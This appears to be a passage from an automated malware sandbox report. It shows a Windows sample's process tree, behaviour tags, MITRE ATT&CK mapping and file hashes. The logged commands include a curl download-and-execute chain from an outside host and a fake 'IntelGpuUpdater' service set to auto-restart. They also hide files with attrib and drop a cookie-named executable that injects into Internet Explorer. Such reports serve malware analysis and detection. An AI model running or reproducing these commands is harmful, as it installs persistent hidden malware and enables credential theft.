C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\test.exe" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2468
-
-
-
C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\notepad.exenotepad7⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 54⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3680
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
PID:1720 -
C:\Windows\SysWOW64\cmd.execmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1852 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:3764
-
-
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/nssm.exe4⤵
- System Location Discovery: System Language Discovery
PID:2456
-
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4040
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc start IntelGpuUpdater4⤵
- System Location Discovery: System Language Discovery
PID:3236 -
C:\Windows\SysWOW64\sc.exesc start IntelGpuUpdater5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50004⤵
- System Location Discovery: System Language Discovery
PID:1992 -
C:\Windows\SysWOW64\sc.exesc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50005⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3756
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause2⤵
- System Location Discovery: System Language Discovery
PID:588
-
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2132 -
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows\IntelGpuUpdater.exe" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:5112 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\IntelGpuUpdater.exe" +s +h4⤵
- Sets file to hidden
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:852 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows" +s +h4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2452
-
-
-
C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe"C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3464 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"4⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4700 -
C:\Windows\notepad.exenotepad5⤵
- Modifies data under HKEY_USERS
PID:848
-
-
-
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2972
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3408
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2212
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3924
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1468
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3128
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
251KB
MD557bd4f73690590693b5b921f29679410
SHA1c2cb47bf602541043589e979f21c3d7c1698e3ac
SHA2568a3de78cf177be4c37c1525becf05af336c1dc2a4d181cae79f6903754902efa
SHA51200b543644058a93f1c0a13e4d40b1c4e76f9581325f1773d79983761ca6903643e5a44717e7785b27a8fac2a6609c19032e3f412d3339e9cc5dc697791890318
-
Filesize
256KB
MD5c721739bd54dd9beb16909f6807b73c5
SHA15ec54658246914144293357f302e68bf9972fb71
SHA2567376ce1eefd786d30efbecb716a13e9d23d27cfc362ce1bbc2fbebdf4fbf54ea
SHA5120800c5f0425237219d7d34654cc021b8b8aa1fce1545ba9815c7be12a623edb08a098fd4de40ccc867487639647cb7f316316464a3a0bdb0650fdd2852408b4e